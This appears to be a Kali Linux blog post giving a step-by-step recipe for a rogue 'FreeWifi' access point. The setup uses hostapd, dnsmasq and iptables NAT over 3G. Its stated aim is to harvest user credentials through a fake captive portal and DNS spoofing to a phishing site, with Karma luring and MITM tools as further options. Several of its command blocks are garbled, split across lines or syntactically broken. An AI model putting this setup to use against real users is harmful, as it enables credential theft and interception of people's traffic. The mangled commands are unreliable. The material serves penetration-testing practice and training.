offensive-security.com

Kali Linux Evil Wireless Access Point

admin
Kali Evil Access Point

A few days ago, we had the opportunity to deploy a rogue access point that would steal user credentials using a fake, captive web portal, and provide MITM’d Internet services via 3G. We needed reliability and scalability in our environment as there would potentially be a large amount of, erm….”participants” in this wireless network. We were pretty happy with the result and quickly realized that we had created a new “Kali Linux recipe”. Or in other words, we could create a custom, bootable wireless evil access point image, which could do all sorts of wondrous things.

Required Hardware

  • We used a battery-powered Raspberry Pi for this project, however the instructions below will work on pretty much anything that can run Kali Linux and has 2 free USB ports – ARM and virtual environments included.

  • A supported USB wireless adapter; we used an old Netgear WNA1000 we had lying around.

  • A supported 3G modem; we found a TP-Link MA180 3.75G HSUPA USB Adapter in a local shop.

Simple Setup of DNS and DHCP

We ended up building our wireless access point using hostapd and dnsmasq using a relatively simple setup. We found that this gave the most reliable performance and was the easiest to configure. In addition, using dnsmasq allowed us to easily control spoofed DNS queries. We start by installing all our prerequisites:

apt-get install -y hostapd dnsmasq wireless-tools iw wvdial

Once everything is installed, we configure dnsmasq to serve DHCP and DNS on the wireless interface and then start the dnsmasq service.

sed-i's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#'/

etc

/

init.d

/

hostapd

cat > /etc/dnsmasq.conf

log-facility=

/

var

/

log

/

dnsmasq.log


#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface

=wlan0

dhcp-range=10.0.0.10,10.0.0.250,12h

dhcp-option=

3

,10.0.0.1

dhcp-option=

6

,10.0.0.1


#no-resolv

log-queries

EOF

service dnsmasq start

Setting up the 3G Connection

updated-new-mobile-3g

This part was surprisingly simple using the Gnome NetworkManager GUI interface. Adding a new 3G connection and going through the automated wizard got us online in a couple of minutes. Once connected, we saw our new ppp0 WAN interface, now providing us with Internet access. Alternatively, this setup can be performed at the command line using wvdial. Now that we have our WAN connection setup, let’s move on to setting up the wireless access point.

ppp-established

Setting up the Wireless Access Point

connect-to-me

Setting up the access point is a breeze using hostapd. We configure an IP for the wireless interface, and configure iptables rules for NAT. Then we quickly configure the hostapd service to use our wireless interface to run an access point with the SSID “FreeWifi”. Once the service is started a wireless network called “FreeWifi” should show up. Anyone connecting to this network would be routed thorough our Kali box, out to the internet over 3g.

ifconfig

wlan0 up


ifconfig

wlan0 10.0.0.1

/24

iptables -t nat -F

iptables

-F

iptables

-t

nat

-A

POSTROUTING

-o

ppp0

-j

MASQUERADE

iptables

-A

FORWARD

-i

wlan0

-o

ppp0

-j

ACCEPT


echo'1'>/

proc

/

sys

/

net

/

ipv4

/

ip_forward

cat > /etc/hostapd/hostapd.conf


interface

=wlan0


driver

=nl80211


ssid

=FreeWifi


channel

=

1
# Yes, we support the Karma attack.
#enable_karma=1

EOF

service hostapd start

Bootable Kali Access Point ISO Recipe

Using live-build, we can create a custom Kali Linux ISO image that will boot up into a “rogue AP”. Certain elements such as the wireless and 3G interface names (wlan0, ppp0, etc) would be pre-configured during the live-build process. We’ve gone ahead and set up a Kali Recipe which worked perfectly in our VMware environment, with both the wireless card and 3G modem connected to the VM at boot time.

Doing the Evil Stuff

There’s a whole bunch of evil stuff to be done once we’re in the middle of communications. MITM tools like responder, evilgrade and sslsplit come to mind. In our case, selectively spoofing DNS queries and redirecting users to our own phishing site was sufficient for our task. Lastly, we’ve added the Karma patch to our hostapd package, which causes the AP to probe requests not just for itself but for any ESSID requested. This allows the AP to act as a lure to draw in any clients probing for known networks. Let the games begin!

Looking for more cool stuff? Kali linux Dojo

Looking for more cool stuff to do with Kali Linux? Want to get some mind bending hands-on experience with the distribution? You should check out our Kali Linux Dojo!